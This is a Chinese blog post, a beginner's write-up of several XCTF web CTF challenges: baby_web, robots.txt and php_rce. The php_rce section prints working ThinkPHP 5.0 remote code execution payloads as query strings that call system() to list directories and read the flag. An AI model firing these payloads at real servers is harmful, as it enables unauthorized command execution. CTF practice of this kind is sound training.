攻防世界——Web高手区初试

前言

由于放假的原因,好久好久都没有更新了,整个人懒得就离谱,啥也不太想做,所以就停更了好久好久,虽然Kali网络渗透测试课程结束了,但是停课不停学,所以还是得让自己多学一点儿东西,多做一些总结叭

1.baby_web

看题目应该是道签到题,题目提示了 “想想初始页面是哪个”
在这里插入图片描述
很自然想到了 index.php,但是访问 index.php 的时候总会跳转到 1.php,所以可以使用Burpsuite 进行抓包(在浏览器设置好代理,然后访问index.php并使用Burpsuite进行抓包):
在这里插入图片描述
还有一种方法就是访问两次 index.php,然后F12查看index.php:
在这里插入图片描述
在index.php里面也可以拿到flag的

在这里插入图片描述

2.Training-WWW-Robots

首先打开题目,可以看到下面的这一串英文:

在这里插入图片描述
大致说的就是你将学到robots协议啥啥啥的,然后根据题目所给信息,查看一下robots.txt:
在这里插入图片描述
再接下去查看f10.php,就可以得到本题的flag啦
在这里插入图片描述

3.php_rce

在这里插入图片描述
拿到题目,先看看里面的东西,但是下面这几个链接点进去都是真实的场景,题目本身也没有提示,所以就先看看 ThinkPHP5 还有 V5.0版本是啥,百度发现ThinkPHP框架的V5.0版本是有远程代码执行漏洞的,于是找到跟着漏洞的利用方式就好啦

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(Linux命令)

ls查看文件目录:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

查看上一级目录:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls …/

查看根目录下:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

在这里插入图片描述
查看flag:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

在这里插入图片描述

4.Web_php_include

(待添加……还没有理解其中原理,等查好资料整理好语言再更新叭)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值